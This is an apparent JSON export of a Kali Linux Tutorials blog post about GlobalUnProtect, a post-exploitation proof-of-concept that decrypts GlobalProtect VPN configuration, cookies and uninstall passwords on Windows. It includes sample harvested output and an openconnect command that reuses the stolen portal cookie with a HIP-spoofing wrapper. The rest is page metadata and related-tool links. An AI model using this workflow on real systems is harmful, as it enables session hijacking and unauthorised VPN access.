{"id":34939,"date":"2024-09-23T06:22:32","date_gmt":"2024-09-23T06:22:32","guid":{"rendered":"https:\/\/kalilinuxtutorials.com\/?p=34939"},"modified":"2024-09-23T06:22:34","modified_gmt":"2024-09-23T06:22:34","slug":"globalunprotect","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/globalunprotect\/","title":{"rendered":"GlobalUnProtect – Decrypting And Harvesting Sensitive Data From GlobalProtect Installations"},"content":{"rendered":"\n

PoC tool for decrypting and collecting GlobalProtect configuration, cookies, and HIP files from windows client installations.<\/p>\n\n\n\n

Usage<\/strong><\/h2>\n\n\n\n

<\/a>Run as standalone or in-memory via execute-assembly or equivalent. Collects all contents to an in-memory zip and writes to specified location.<\/p>\n\n\n\n

> GlobalUnProtect.exe\nUsage: GlobalUnProtect.exe C:\\Path\\To\\Output.zip<\/code><\/pre>\n\n\n\n
> GlobalUnProtect.exe %TEMP%\\GPUnprotect.zip\n[*] Deriving AES key from computer SID\n        [*] Computer SID (Hex) : 010400000000000515000000EFC8897F22AF1E09042DC851\n        [*] Derived AES Key: C41006BCDBEF6683B2E7387EA9487A77C41006BCDBEF6683B2E7387EA9487A77\n[*] Starting search for GlobalProtect data files\n        [*] Found: C:\\Users\\User\\AppData\\Local\\Palo Alto Networks\\GlobalProtect\\PanPCD_2ab96390c7dbe3439de74d0c9b0b1767.dat\n        [*] Found: C:\\Users\\User\\AppData\\Local\\Palo Alto Networks\\GlobalProtect\\PanPortalCfg_2ab96390c7dbe3439de74d0c9b0b17676.dat\n        [*] Found: C:\\Users\\User\\AppData\\Local\\Palo Alto Networks\\GlobalProtect\\PanPUAC_2ab96390c7dbe3439de74d0c9b0b1767.dat\n[*] PanPortalCfg_2ab96390c7dbe3439de74d0c9b0b1767.dat looks like a portal config file, parsing for convenience:\n        [*] User Name: example\\user\n        [*] Portal: vpn.example.com\n        [*] User Domain: example\n        [*] Portal Name: \n        [*] Tenant Id: 100001\n        [*] Uninstall password: uninstall-password\n        [*] Portal Pre-logon Cookie: empty\n        [*] Portal User-auth Cookie: NzFkZjM0NGJlNjQ0NGEyMzQyMDQ4MmY3ZWE1ZWY1Y2ZhN2FiNTEyNDg0OTJhNWI0NTlhNjkzZjNmMDE2MTYzNzAyMjAzNWE2MGY0Y2I0YmVlMWIyNzExNGYzMTQwYTA5YTY3MTFjNDQ2MmQ3MjQ4NTE5MDEzYzU1OWQ4MzgwYjU=\n[*] Collecting HIP profile data files\n        [*] Found: C:\\Program Files\\Palo Alto Networks\\GlobalProtect\\HIP_AM_Report_V4.dat\n        [*] Found: C:\\Program Files\\Palo Alto Networks\\GlobalProtect\\HIP_BC_Report_V4.dat\n        [*] Found: C:\\Program Files\\Palo Alto Networks\\GlobalProtect\\HIP_DE_Report_V4.dat\n        [*] Found: C:\\Program Files\\Palo Alto Networks\\GlobalProtect\\HIP_DLP_Report_V4.dat\n        [*] Found: C:\\Program Files\\Palo Alto Networks\\GlobalProtect\\HIP_FW_Report_V4.dat\n        [*] Found: C:\\Program Files\\Palo Alto Networks\\GlobalProtect\\HIP_PM_Report_V4.dat\n        [*] Found: C:\\Program Files\\Palo Alto Networks\\GlobalProtect\\HipPolicy.dat\n        [*] Found: C:\\Program Files\\Palo Alto Networks\\GlobalProtect\\PanGpHip.log\n[*] Writing output ZIP file to C:\\Users\\User\\AppData\\Local\\Temp\\GPUnprotect.zip<\/code><\/pre>\n\n\n\n
Connect via OpenConnect:<\/p>\n\n\n\n
$ sudo openconnect --protocol=gp --user=\"example\\\\username\" --usergroup=portal:portal-userauthcookie --os=win https:\/\/vpn.example.com --csd-wrapper ~\/tools\/custom-hips-profile.sh<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
PoC tool for decrypting and collecting GlobalProtect configuration, cookies, and HIP files from windows client installations. Usage Run as standalone or in-memory via execute-assembly or equivalent. Collects all contents to an in-memory zip and writes to specified location. Connect via OpenConnect:<\/p>\n","protected":false},"author":12,"featured_media":34944,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhUowVEBKbQXuJIDlt2onsZw_FVAol5yC8hk_whMkUwN_j_uPlnTwdv1B09EN2NOKodSsHirVqxfhp5ofwt9Dg80WagxTjDrY_rYl98yqqoo59ZJ95HZRMBqZhsOsEHZB3Bi7AU0DwYTt2aiKTL8Xtsrc1jbtpuJ_YHV0ux-x3hekZWArwr4RGuCIPOiQ9g\/s1600\/GlobalUnProtect%20.webp","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[34],"tags":[737,6942,6321,6052,6325],"class_list":["post-34939","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-pe","tag-cybersecurity","tag-globalunprotect","tag-informationsecurity","tag-kalilinux","tag-kalilinuxtools"],"yoast_head":"\nGlobalUnProtect - Decrypting And Harvesting Sensitive Data<\/title>\n<meta name=\"description\" content=\"PoC tool for decrypting and collecting GlobalProtect configuration, cookies, and HIP files from windows client installations.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kalilinuxtutorials.com\/globalunprotect\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"GlobalUnProtect - Decrypting And Harvesting Sensitive Data\" \/>\n<meta property=\"og:description\" content=\"PoC tool for decrypting and collecting GlobalProtect configuration, cookies, and HIP files from windows client installations.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kalilinuxtutorials.com\/globalunprotect\/\" \/>\n<meta property=\"og:site_name\" content=\"Kali Linux Tutorials\" \/>\n<meta property=\"article:published_time\" content=\"2024-09-23T06:22:32+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-09-23T06:22:34+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhUowVEBKbQXuJIDlt2onsZw_FVAol5yC8hk_whMkUwN_j_uPlnTwdv1B09EN2NOKodSsHirVqxfhp5ofwt9Dg80WagxTjDrY_rYl98yqqoo59ZJ95HZRMBqZhsOsEHZB3Bi7AU0DwYTt2aiKTL8Xtsrc1jbtpuJ_YHV0ux-x3hekZWArwr4RGuCIPOiQ9g\/s1600\/GlobalUnProtect%20.webp\" \/>\n<meta name=\"author\" content=\"Varshini\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhUowVEBKbQXuJIDlt2onsZw_FVAol5yC8hk_whMkUwN_j_uPlnTwdv1B09EN2NOKodSsHirVqxfhp5ofwt9Dg80WagxTjDrY_rYl98yqqoo59ZJ95HZRMBqZhsOsEHZB3Bi7AU0DwYTt2aiKTL8Xtsrc1jbtpuJ_YHV0ux-x3hekZWArwr4RGuCIPOiQ9g\/s1600\/GlobalUnProtect%20.webp\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:site\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Varshini\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/globalunprotect\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/globalunprotect\/\"},\"author\":{\"name\":\"Varshini\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/3c3b3f82a74146532c4def299fe069fa\"},\"headline\":\"GlobalUnProtect – Decrypting And Harvesting Sensitive Data From GlobalProtect Installations\",\"datePublished\":\"2024-09-23T06:22:32+00:00\",\"dateModified\":\"2024-09-23T06:22:34+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/globalunprotect\/\"},\"wordCount\":51,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/globalunprotect\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhUowVEBKbQXuJIDlt2onsZw_FVAol5yC8hk_whMkUwN_j_uPlnTwdv1B09EN2NOKodSsHirVqxfhp5ofwt9Dg80WagxTjDrY_rYl98yqqoo59ZJ95HZRMBqZhsOsEHZB3Bi7AU0DwYTt2aiKTL8Xtsrc1jbtpuJ_YHV0ux-x3hekZWArwr4RGuCIPOiQ9g\/s1600\/GlobalUnProtect%20.webp\",\"keywords\":[\"cybersecurity\",\"GlobalUnProtect\",\"informationsecurity\",\"kalilinux\",\"kalilinuxtools\"],\"articleSection\":[\"Post Exploitation\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/globalunprotect\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/globalunprotect\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/globalunprotect\/\",\"name\":\"GlobalUnProtect - Decrypting And Harvesting Sensitive Data\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/globalunprotect\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/globalunprotect\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhUowVEBKbQXuJIDlt2onsZw_FVAol5yC8hk_whMkUwN_j_uPlnTwdv1B09EN2NOKodSsHirVqxfhp5ofwt9Dg80WagxTjDrY_rYl98yqqoo59ZJ95HZRMBqZhsOsEHZB3Bi7AU0DwYTt2aiKTL8Xtsrc1jbtpuJ_YHV0ux-x3hekZWArwr4RGuCIPOiQ9g\/s1600\/GlobalUnProtect%20.webp\",\"datePublished\":\"2024-09-23T06:22:32+00:00\",\"dateModified\":\"2024-09-23T06:22:34+00:00\",\"description\":\"PoC tool for decrypting and collecting GlobalProtect configuration, cookies, and HIP files from windows client installations.\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/globalunprotect\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/globalunprotect\/#primaryimage\",\"url\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhUowVEBKbQXuJIDlt2onsZw_FVAol5yC8hk_whMkUwN_j_uPlnTwdv1B09EN2NOKodSsHirVqxfhp5ofwt9Dg80WagxTjDrY_rYl98yqqoo59ZJ95HZRMBqZhsOsEHZB3Bi7AU0DwYTt2aiKTL8Xtsrc1jbtpuJ_YHV0ux-x3hekZWArwr4RGuCIPOiQ9g\/s1600\/GlobalUnProtect%20.webp\",\"contentUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhUowVEBKbQXuJIDlt2onsZw_FVAol5yC8hk_whMkUwN_j_uPlnTwdv1B09EN2NOKodSsHirVqxfhp5ofwt9Dg80WagxTjDrY_rYl98yqqoo59ZJ95HZRMBqZhsOsEHZB3Bi7AU0DwYTt2aiKTL8Xtsrc1jbtpuJ_YHV0ux-x3hekZWArwr4RGuCIPOiQ9g\/s1600\/GlobalUnProtect%20.webp\",\"width\":\"1600\",\"height\":\"900\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"name\":\"Kali Linux Tutorials\",\"description\":\"Kali Linux Tutorials\",\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\",\"name\":\"Kali Linux Tutorials\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"contentUrl\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"width\":272,\"height\":90,\"caption\":\"Kali Linux Tutorials\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/CyberEdition\",\"https:\/\/www.threads.com\/@cybersecurityedition\",\"https:\/\/www.linkedin.com\/company\/cyberedition\",\"https:\/\/www.instagram.com\/cybersecurityedition\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/3c3b3f82a74146532c4def299fe069fa\",\"name\":\"Varshini\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/f19f43637c0f83fb3dcfb498f306b2a9ac0025ce85840ab52ee8c01f5361f269?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/f19f43637c0f83fb3dcfb498f306b2a9ac0025ce85840ab52ee8c01f5361f269?s=96&d=mm&r=g\",\"caption\":\"Varshini\"},\"description\":\"Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.\",\"sameAs\":[\"http:\/\/kalilinuxtutorials.com\",\"https:\/\/www.linkedin.com\/in\/senthamil-selvan-14043a285\/\"],\"url\":\"https:\/\/kalilinuxtutorials.com\/author\/vinayakagrawal\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"GlobalUnProtect - Decrypting And Harvesting Sensitive Data","description":"PoC tool for decrypting and collecting GlobalProtect configuration, cookies, and HIP files from windows client installations.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kalilinuxtutorials.com\/globalunprotect\/","og_locale":"en_US","og_type":"article","og_title":"GlobalUnProtect - Decrypting And Harvesting Sensitive Data","og_description":"PoC tool for decrypting and collecting GlobalProtect configuration, cookies, and HIP files from windows client installations.","og_url":"https:\/\/kalilinuxtutorials.com\/globalunprotect\/","og_site_name":"Kali Linux Tutorials","article_published_time":"2024-09-23T06:22:32+00:00","article_modified_time":"2024-09-23T06:22:34+00:00","og_image":[{"url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhUowVEBKbQXuJIDlt2onsZw_FVAol5yC8hk_whMkUwN_j_uPlnTwdv1B09EN2NOKodSsHirVqxfhp5ofwt9Dg80WagxTjDrY_rYl98yqqoo59ZJ95HZRMBqZhsOsEHZB3Bi7AU0DwYTt2aiKTL8Xtsrc1jbtpuJ_YHV0ux-x3hekZWArwr4RGuCIPOiQ9g\/s1600\/GlobalUnProtect%20.webp","type":"","width":"","height":""}],"author":"Varshini","twitter_card":"summary_large_image","twitter_image":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhUowVEBKbQXuJIDlt2onsZw_FVAol5yC8hk_whMkUwN_j_uPlnTwdv1B09EN2NOKodSsHirVqxfhp5ofwt9Dg80WagxTjDrY_rYl98yqqoo59ZJ95HZRMBqZhsOsEHZB3Bi7AU0DwYTt2aiKTL8Xtsrc1jbtpuJ_YHV0ux-x3hekZWArwr4RGuCIPOiQ9g\/s1600\/GlobalUnProtect%20.webp","twitter_creator":"@CyberEdition","twitter_site":"@CyberEdition","twitter_misc":{"Written by":"Varshini","Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kalilinuxtutorials.com\/globalunprotect\/#article","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/globalunprotect\/"},"author":{"name":"Varshini","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/3c3b3f82a74146532c4def299fe069fa"},"headline":"GlobalUnProtect – Decrypting And Harvesting Sensitive Data From GlobalProtect Installations","datePublished":"2024-09-23T06:22:32+00:00","dateModified":"2024-09-23T06:22:34+00:00","mainEntityOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/globalunprotect\/"},"wordCount":51,"commentCount":0,"publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/globalunprotect\/#primaryimage"},"thumbnailUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhUowVEBKbQXuJIDlt2onsZw_FVAol5yC8hk_whMkUwN_j_uPlnTwdv1B09EN2NOKodSsHirVqxfhp5ofwt9Dg80WagxTjDrY_rYl98yqqoo59ZJ95HZRMBqZhsOsEHZB3Bi7AU0DwYTt2aiKTL8Xtsrc1jbtpuJ_YHV0ux-x3hekZWArwr4RGuCIPOiQ9g\/s1600\/GlobalUnProtect%20.webp","keywords":["cybersecurity","GlobalUnProtect","informationsecurity","kalilinux","kalilinuxtools"],"articleSection":["Post Exploitation"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/kalilinuxtutorials.com\/globalunprotect\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/kalilinuxtutorials.com\/globalunprotect\/","url":"https:\/\/kalilinuxtutorials.com\/globalunprotect\/","name":"GlobalUnProtect - Decrypting And Harvesting Sensitive Data","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/globalunprotect\/#primaryimage"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/globalunprotect\/#primaryimage"},"thumbnailUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhUowVEBKbQXuJIDlt2onsZw_FVAol5yC8hk_whMkUwN_j_uPlnTwdv1B09EN2NOKodSsHirVqxfhp5ofwt9Dg80WagxTjDrY_rYl98yqqoo59ZJ95HZRMBqZhsOsEHZB3Bi7AU0DwYTt2aiKTL8Xtsrc1jbtpuJ_YHV0ux-x3hekZWArwr4RGuCIPOiQ9g\/s1600\/GlobalUnProtect%20.webp","datePublished":"2024-09-23T06:22:32+00:00","dateModified":"2024-09-23T06:22:34+00:00","description":"PoC tool for decrypting and collecting GlobalProtect configuration, cookies, and HIP files from windows client installations.","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kalilinuxtutorials.com\/globalunprotect\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/globalunprotect\/#primaryimage","url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhUowVEBKbQXuJIDlt2onsZw_FVAol5yC8hk_whMkUwN_j_uPlnTwdv1B09EN2NOKodSsHirVqxfhp5ofwt9Dg80WagxTjDrY_rYl98yqqoo59ZJ95HZRMBqZhsOsEHZB3Bi7AU0DwYTt2aiKTL8Xtsrc1jbtpuJ_YHV0ux-x3hekZWArwr4RGuCIPOiQ9g\/s1600\/GlobalUnProtect%20.webp","contentUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhUowVEBKbQXuJIDlt2onsZw_FVAol5yC8hk_whMkUwN_j_uPlnTwdv1B09EN2NOKodSsHirVqxfhp5ofwt9Dg80WagxTjDrY_rYl98yqqoo59ZJ95HZRMBqZhsOsEHZB3Bi7AU0DwYTt2aiKTL8Xtsrc1jbtpuJ_YHV0ux-x3hekZWArwr4RGuCIPOiQ9g\/s1600\/GlobalUnProtect%20.webp","width":"1600","height":"900"},{"@type":"WebSite","@id":"https:\/\/kalilinuxtutorials.com\/#website","url":"https:\/\/kalilinuxtutorials.com\/","name":"Kali Linux Tutorials","description":"Kali Linux Tutorials","publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/kalilinuxtutorials.com\/#organization","name":"Kali Linux Tutorials","url":"https:\/\/kalilinuxtutorials.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/","url":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","contentUrl":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","width":272,"height":90,"caption":"Kali Linux Tutorials"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/CyberEdition","https:\/\/www.threads.com\/@cybersecurityedition","https:\/\/www.linkedin.com\/company\/cyberedition","https:\/\/www.instagram.com\/cybersecurityedition\/"]},{"@type":"Person","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/3c3b3f82a74146532c4def299fe069fa","name":"Varshini","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/f19f43637c0f83fb3dcfb498f306b2a9ac0025ce85840ab52ee8c01f5361f269?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f19f43637c0f83fb3dcfb498f306b2a9ac0025ce85840ab52ee8c01f5361f269?s=96&d=mm&r=g","caption":"Varshini"},"description":"Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.","sameAs":["http:\/\/kalilinuxtutorials.com","https:\/\/www.linkedin.com\/in\/senthamil-selvan-14043a285\/"],"url":"https:\/\/kalilinuxtutorials.com\/author\/vinayakagrawal\/"}]}},"jetpack_featured_media_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhUowVEBKbQXuJIDlt2onsZw_FVAol5yC8hk_whMkUwN_j_uPlnTwdv1B09EN2NOKodSsHirVqxfhp5ofwt9Dg80WagxTjDrY_rYl98yqqoo59ZJ95HZRMBqZhsOsEHZB3Bi7AU0DwYTt2aiKTL8Xtsrc1jbtpuJ_YHV0ux-x3hekZWArwr4RGuCIPOiQ9g\/s1600\/GlobalUnProtect%20.webp","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":5520,"url":"https:\/\/kalilinuxtutorials.com\/cryptr-encrypting-decrypting\/","url_meta":{"origin":34939,"position":0},"title":"Cryptr : A Simple Shell Utility For Encrypting & Decrypting Files Using OpenSSL","author":"R K","date":"June 28, 2019","format":false,"excerpt":"Cryptr is a simple shell utility for encrypting and decryption files using OpenSSL. Installation git clone https:\/\/github.com\/nodesocket\/cryptr.git ln -s \"$PWD\"\/cryptr\/cryptr.bash \/usr\/local\/bin\/cryptr Bash tab completion Add\u00a0tools\/cryptr-bash-completion.bash\u00a0to your tab completion file directory. API\/Commands Encrypt encrypt <file> - Encryptes file with OpenSSL AES-256 cipher block chaining. Writes an encrypted file out\u00a0(ciphertext)appending\u00a0.aes\u00a0extension. \u279c cryptr\u2026","rel":"","context":"In "Kali Linux"","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":5747,"url":"https:\/\/kalilinuxtutorials.com\/ghostfuscator\/","url_meta":{"origin":34939,"position":1},"title":"Ghostfuscator : The Python Password-Protected Obfuscator","author":"R K","date":"July 15, 2019","format":false,"excerpt":"Ghostfuscator is a obfuscate python scripts making them password-protected using AES Encryption. Usage Just execute the script, and follow the menu. Also Read - WinObjEx64 : Windows Object Explorer 64-bit Info Once an script is obfuscated, when running it a password asking prompt will appear, after submitting the correct password,\u2026","rel":"","context":"In "Kali Linux"","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":25535,"url":"https:\/\/kalilinuxtutorials.com\/chlonium\/","url_meta":{"origin":34939,"position":2},"title":"Chlonium : Chromium Cookie Import \/ Export Tool","author":"R K","date":"June 25, 2022","format":false,"excerpt":"Chlonium is an application designed for cloning Chromium Cookies. From Chromium 80 and upwards, cookies are encrypted using AES-256 GCM, with a state key which is stored in the Local State file. This state key is encrypted using DPAPI. This is a change from older versions, which used DPAPI to\u2026","rel":"","context":"In "Kali Linux"","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEix-oee2TgDFWWrn7Nq84Cvnz7KOhni_zhXAU-dZ-3XXLHfuMWRUpLB847QGJj8ebTu3Mf7ge8gOghAFwDfWhHgBVbXJKR1mpPfndli1LVhuYAKcOQaqucrwkegsuiKlUPnDukkzeSUc4rSAifIopaEaUirAVn5s3_yIjsfXpSZikW3-Bdi57fBAnlK\/s728\/Screenshot-2021-11-14-152921%20%281%29.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEix-oee2TgDFWWrn7Nq84Cvnz7KOhni_zhXAU-dZ-3XXLHfuMWRUpLB847QGJj8ebTu3Mf7ge8gOghAFwDfWhHgBVbXJKR1mpPfndli1LVhuYAKcOQaqucrwkegsuiKlUPnDukkzeSUc4rSAifIopaEaUirAVn5s3_yIjsfXpSZikW3-Bdi57fBAnlK\/s728\/Screenshot-2021-11-14-152921%20%281%29.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEix-oee2TgDFWWrn7Nq84Cvnz7KOhni_zhXAU-dZ-3XXLHfuMWRUpLB847QGJj8ebTu3Mf7ge8gOghAFwDfWhHgBVbXJKR1mpPfndli1LVhuYAKcOQaqucrwkegsuiKlUPnDukkzeSUc4rSAifIopaEaUirAVn5s3_yIjsfXpSZikW3-Bdi57fBAnlK\/s728\/Screenshot-2021-11-14-152921%20%281%29.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEix-oee2TgDFWWrn7Nq84Cvnz7KOhni_zhXAU-dZ-3XXLHfuMWRUpLB847QGJj8ebTu3Mf7ge8gOghAFwDfWhHgBVbXJKR1mpPfndli1LVhuYAKcOQaqucrwkegsuiKlUPnDukkzeSUc4rSAifIopaEaUirAVn5s3_yIjsfXpSZikW3-Bdi57fBAnlK\/s728\/Screenshot-2021-11-14-152921%20%281%29.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":36175,"url":"https:\/\/kalilinuxtutorials.com\/chromestealer\/","url_meta":{"origin":34939,"position":3},"title":"ChromeStealer : A Tool For Extracting Chrome Passwords","author":"Varshini","date":"February 6, 2025","format":false,"excerpt":"ChromeStealer is an educational tool developed by @bernKing20 to demonstrate how to extract and decrypt stored passwords from Google Chrome on Windows systems using C\/C++. The project aims to address gaps in existing resources by providing a functional and detailed implementation. Key Features And Functionality ChromeStealer focuses on decrypting passwords\u2026","rel":"","context":"In "Cyber security"","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/ChromeStealer.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/ChromeStealer.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/ChromeStealer.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/ChromeStealer.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/ChromeStealer.webp?resize=1050%2C600&ssl=1 3x, 